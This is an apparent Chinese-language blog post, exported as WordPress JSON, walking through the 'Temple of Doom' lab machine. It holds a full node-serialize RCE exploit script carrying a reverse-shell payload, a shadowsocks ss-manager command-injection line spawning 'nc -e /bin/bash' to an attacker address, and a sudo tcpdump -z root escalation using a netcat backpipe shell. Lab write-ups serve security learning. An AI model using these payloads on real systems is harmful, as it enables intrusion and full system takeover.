{"id":270,"date":"2024-04-27T15:21:22","date_gmt":"2024-04-27T07:21:22","guid":{"rendered":"http:\/\/xiyu12.top\/?p=270"},"modified":"2024-04-27T15:21:22","modified_gmt":"2024-04-27T07:21:22","slug":"temple-of-doom","status":"publish","type":"post","link":"http:\/\/www.xiyu12.top\/?p=270","title":{"rendered":"temple of doom"},"content":{"rendered":"\n

\u4fe1\u606f\u6536\u96c6<\/h2>\n\n\n\n
sudo nmap -sT --min-rate 10000 -p- 192.168.56.4\nStarting Nmap 7.92 ( https:\/\/nmap.org ) at 2024-04-27 15:15 CST\nNmap scan report for 192.168.56.4\nHost is up (0.036s latency).\nNot shown: 65533 closed tcp ports (conn-refused)\nPORT    STATE SERVICE\n22\/tcp  open  ssh\n666\/tcp open  doom\nMAC Address: 08:00:27:BB:24:1C (Oracle VirtualBox virtual NIC)\n<\/code><\/pre>\n\n\n\n
TCP \u7aef\u53e3 666 \u8fc7\u53bb\u66fe\u88ab\u9ed1\u5ba2\u5229\u7528\uff0c\u7279\u522b\u662f\u7528\u4e8e\u6267\u884c\u5206\u5e03\u5f0f\u62d2\u7edd\u670d\u52a1 \uff08DDoS\uff09 \u653b\u51fb\u3002\u6b64\u7aef\u53e3\u901a\u5e38\u4e0e Doom \u6e38\u620f\u76f8\u5173\u8054\uff0c\u53ef\u4ee5\u5bf9\u5176\u8fdb\u884c\u64cd\u4f5c\u4ee5\u5141\u8bb8\u672a\u7ecf\u6388\u6743\u7684\u8fdc\u7a0b\u8bbf\u95ee\u3002\u4f17\u6240\u5468\u77e5\uff0c\u9ed1\u5ba2\u4f7f\u7528\u7aef\u53e3 666 \u8fdb\u884c\u57fa\u4e8e IRC\uff08Internet Relay Chat\uff09\u7684\u653b\u51fb\uff0c\u5728\u90a3\u91cc\u4ed6\u4eec\u4e3a\u6076\u610f\u6d3b\u52a8\u521b\u5efa\u50f5\u5c38\u7f51\u7edc\u3002\u6b64\u5916\uff0c\u5df2\u77e5\u4e00\u4e9b\u7279\u6d1b\u4f0a\u6728\u9a6c\uff08\u5982\u201cSatanz \u540e\u95e8\u201d\uff09\u4f7f\u7528\u6b64\u7aef\u53e3\u3002\u786e\u4fdd\u6b64\u7aef\u53e3\u7684\u5b89\u5168\u4ee5\u9632\u6b62\u6f5c\u5728\u7684\u5b89\u5168\u6f0f\u6d1e\u81f3\u5173\u91cd\u8981\u3002<\/p>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
\u4f7f\u7528  sudo nmap -sC -sV  -p 666 192.168.56.4<\/p>\n\n\n\n
Starting Nmap 7.92 ( https:\/\/nmap.org ) at 2024-04-27 15:39 CST\nNmap scan report for 192.168.56.4\nHost is up (0.00037s latency).\n\nPORT    STATE SERVICE VERSION\n22\/tcp  open  ssh     OpenSSH 7.7 (protocol 2.0)\n| ssh-hostkey: \n|   2048 95:68:04:c7:42:03:04:cd:00:4e:36:7e:cd:4f:66:ea (RSA)\n|   256 c3:06:5f:7f:17:b6:cb:bc:79:6b:46:46:cc:11:3a:7d (ECDSA)\n|_  256 63:0c:28:88:25:d5:48:19:82:bb:bd:72:c6:6c:68:50 (ED25519)\n666\/tcp open  http    Node.js Express framework\n|_http-title: Site doesn't have a title (text\/html; charset=utf-8).\nMAC Address: 08:00:27:BB:24:1C (Oracle VirtualBox virtual NIC)\n\nService detection performed. Please report any incorrect results at https:\/\/nmap.org\/submit\/ .\nNmap done: 1 IP address (1 host up) scanned in 24.80 seconds\n                                                             <\/code><\/pre>\n\n\n\n
\u53d1\u73b0\u7aef\u53e3666 \u4e0a\u8fd0\u884c\u7684\u670d\u52a1\u662f node.js express<\/p>\n\n\n\n
searchsploit node.js\n------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------\n Exploit Title                                                                                                                                         |  Path\n------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------\nNode.JS - 'node-serialize' Remote Code Execution                                                                                                       | linux\/remote\/45265.js\nNode.JS - 'node-serialize' Remote Code Execution (2)                                                                                                   | nodejs\/webapps\/49552.py\nNode.JS - 'node-serialize' Remote Code Execution (3)                                                                                                   | nodejs\/webapps\/50036.js\nTrend Micro - node.js HTTP Server Listening on localhost Can Execute Commands                                                                          | windows\/remote\/39218.html\n------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------\nShellcodes: No Results\n------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------\n Paper Title                                                                                                                                           |  Path\n------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------\nExploiting Node.js deserialization bug for Remote Code Execution                                                                                       | docs\/english\/41289-exploiting-no\n------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------<\/code><\/pre>\n\n\n\n
\u770b\u4e0b\u9762\u7684\u811a\u672c\u53ef\u4ee5\u77e5\u9053   payload \u6784\u9020\u5230 cookie \u4e2d<\/p>\n\n\n\n
node.js express exploit<\/h2>\n\n\n\n
# Exploit Title: Node.JS - 'node-serialize' Remote Code Execution (2)\n# Exploit Author: UndeadLarva\n# Software Link: https:\/\/www.npmjs.com\/package\/node-serialize\n# Version: 0.0.4\n# CVE: CVE-2017-5941\n\nimport requests\nimport re\nimport base64\nimport sys\n\nurl = 'http:\/\/192.168.56.4:666' # change this\n\n\npayload = (\"require('http').ServerResponse.prototype.end = (function (end) {\"\n\"return function () {\"\n\"['close', 'connect', 'data', 'drain', 'end', 'error', 'lookup', 'timeout', ''].forEach(this.socket.removeAllListeners.bind(this.socket));\"\n\"console.log('still inside');\"\n\"const { exec } = require('child_process');\"\n\"exec('bash -i >& \/dev\/tcp\/192.168.56.5\/1234 0>&1');\" # change this\n\"}\"\n\"})(require('http').ServerResponse.prototype.end)\")\n\n# rce = \"_$$ND_FUNC$$_process.exit(0)\"\n# code =\"_$$ND_FUNC$$_console.log('behind you')\"\ncode = \"_$$ND_FUNC$$_\" + payload\n\nstring = '{\"username\":\"TheUndead\",\"country\":\"worldwide\",\"city\":\"Tyr\", \"exec\": \"'+code+'\"}'\n\ncookie = {'profile':base64.b64encode(string)}\n\ntry:\n    response = requests.get(url, cookies=cookie).text\n    print response\nexcept requests.exceptions.RequestException as e:\n    print('Oops!')\n    sys.exit(1)\n<\/code><\/pre>\n\n\n\n
nc -lvp 1234<\/p>\n\n\n\n
python exploit.py <\/p>\n\n\n\n
\u63d0\u6743<\/h2>\n\n\n\n
cat \/etc\/passwd | grep \/bin\/bash<\/p>\n\n\n\n
\u53d1\u73b0\u53e6\u4e00\u4e2a\u7528\u6237  fireman<\/p>\n\n\n\n
\u67e5\u770b\u8fdb\u7a0b  .\/pspy64 \u6ca1\u6709\u53d1\u73b0    <\/p>\n\n\n\n
\u641c\u7d22 \u53ef\u7591\u6587\u4ef6   find \/ -wrtable -type f 2>\/dev\/null | grep -v \/proc  | grep -v \/sys  \u6ca1\u6709\u53d1\u73b0<\/p>\n\n\n\n
\u67e5\u627e\u8d26\u6237\u5bc6\u7801\u51ed\u8bc1   grep -ri  pass \/home\/*  2>\/dev\/null   \u6ca1\u6709\u53d1\u73b0<\/p>\n\n\n\n
\u4f7f\u7528  ps -aux  | grep fireman<\/p>\n\n\n\n
root 806 0.0 0.1 301464 4424 ? S Apr26 0:00 su fireman -c \/usr\/local\/bin\/ss-manager<\/p>\n\n\n\n
ss-manger  exploit<\/h2>\n\n\n\n
searchsploit shadowsocks-libev 3.1.0                                                     \u2502\n Exploit Title                                                 |  Path                       \n--------------------------------------------------------------- -----------------------------                                                                                      \nshadowsocks-libev 3.1.0 - Command Execution                    | linux\/local\/43006.txt       \n--------------------------------------------------------------- ----------------------------<\/code><\/pre>\n\n\n\n
 Proof of Concept                              \n----------------                              \nAs passed configuration requests are getting executed, the following command                                                                                                              \nwill create file \"evil\" in \/tmp\/ on the server:                                              \n\nnc -u 127.0.0.1 8839                          \n    add: {\"server_port\":8003, \"password\":\"test\", \"method\":\"||touch                                                                                                                        \n\/tmp\/evil||\"}                                 \n\nThe code is executed through shadowsocks-libev\/src\/manager.c.                                                                                                                             \nIf the configuration file on the file system is manipulated, the code                                                                                                                     \nwould get executed as soon as a Shadowsocks instance is started from                                                                                                                      \nss-manage, as long as the malicious part of the configuration has not                                                                                                                     \nbeen overwritten.   <\/code><\/pre>\n\n\n\n
\u63d0\u6743\u5230 fireman \u7528\u6237<\/p>\n\n\n\n
nc -u 127.0.0.1 8839\n add: {\"server_port\":8003, \"password\":\"test\", \"method\":\"||nc -e \/bin\/bash 192.168.56.5 6666||  \nnc -lvp 6666<\/code><\/pre>\n\n\n\n
sudo  (ALL) NOPASSWD: \/usr\/sbin\/tcpdump<\/h2>\n\n\n\n
\u63d0\u6743\u5230root<\/p>\n\n\n\n
vim \/tmp\/.test  \nmknod backpipe p && nc 192.168.56.5 8080 0<backpipe | \/bin\/bash 1>backpipe\nchmod +x \/tmp\/.test<\/code><\/pre>\n\n\n\n
nc -lvp 8080<\/p>\n\n\n\n
sudo tcpdump -G 1 -ln -i eth0 -w \/dev\/null -W 1 -z \/tmp\/.test -Z root<\/p>\n\n\n\n
\u6bcf\u79d2\u949f\u751f\u6210\u4e00\u4e2a\u65b0\u7684\u6355\u83b7\u6587\u4ef6\uff0c\u7136\u540e\u5c06\u65e7\u7684\u6587\u4ef6\u4f20\u9012\u7ed9\u6307\u5b9a\u7684shell\u547d\u4ee4 \/tmp\/.test<\/code>\uff0c\u4ee5root\u7528\u6237\u8eab\u4efd\u6267\u884c<\/p>\n\n\n\n
\u4e0d\u4f7f\u7528 -G \u9009\u9879\uff0ctcpdump \u5c06\u6301\u7eed\u6355\u83b7\u6570\u636e\u5230\u540c\u4e00\u4e2a\u6587\u4ef6<\/p>\n\n\n\n
    \n
  • -ln<\/code>: \u4f7f\u7528\u6570\u5b57\u663e\u793aIP\u5730\u5740\u548c\u7aef\u53e3\u53f7\u3002<\/li>\n\n\n\n
  • -i eth0<\/code>: \u6307\u5b9a\u8981\u76d1\u542c\u7684\u7f51\u7edc\u63a5\u53e3\u4e3a eth0\u3002<\/li>\n\n\n\n
  • -w \/dev\/null<\/code>: \u5c06\u6355\u83b7\u5230\u7684\u6570\u636e\u5305\u5199\u5165 \/dev\/null\uff0c\u5373\u4e22\u5f03\u6240\u6709\u6355\u83b7\u7684\u6570\u636e\u5305\uff0c\u56e0\u4e3a\u6211\u4eec\u6ca1\u6709\u6307\u5b9a\u5177\u4f53\u7684\u6587\u4ef6\u8def\u5f84\u3002<\/li>\n\n\n\n
  • -W 1<\/code>: \u4ec5\u6355\u83b7\u4e00\u4e2a\u6570\u636e\u5305\u3002<\/li>\n\n\n\n
  • -z \/tmp\/.test<\/code>: \u5f53\u6355\u83b7\u5230\u6570\u636e\u5305\u65f6\uff0c\u6267\u884c \/tmp\/.test \u811a\u672c\u3002<\/li>\n\n\n\n
  • -Z root<\/code>: \u5728\u6267\u884c\u811a\u672c\u65f6\u4f7f\u7528 root \u7528\u6237\u6743\u9650\u3002<\/li>\n<\/ul>\n\n\n\n
    <\/p>\n","protected":false},"excerpt":{"rendered":"
    \u4fe1\u606f\u6536\u96c6 TCP \u7aef\u53e3 666 \u8fc7\u53bb\u66fe\u88ab\u9ed1\u5ba2\u5229\u7528\uff0c\u7279\u522b\u662f\u7528\u4e8e\u6267\u884c\u5206\u5e03\u5f0f\u62d2\u7edd\u670d\u52a1 \uff08DDoS\uff09 \u653b\u51fb\u3002\u6b64\u7aef\u53e3\u901a\u5e38 […]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[9],"tags":[52,53,84,93],"class_list":["post-270","post","type-post","status-publish","format-standard","hentry","category-target-aircraft","tag-node-js-express-exploit","tag-node-js--rce","tag-ss-manger","tag-sudo-tcpdump"],"_links":{"self":[{"href":"http:\/\/www.xiyu12.top\/index.php?rest_route=\/wp\/v2\/posts\/270","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/www.xiyu12.top\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/www.xiyu12.top\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/www.xiyu12.top\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/www.xiyu12.top\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=270"}],"version-history":[{"count":0,"href":"http:\/\/www.xiyu12.top\/index.php?rest_route=\/wp\/v2\/posts\/270\/revisions"}],"wp:attachment":[{"href":"http:\/\/www.xiyu12.top\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=270"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/www.xiyu12.top\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=270"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/www.xiyu12.top\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=270"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}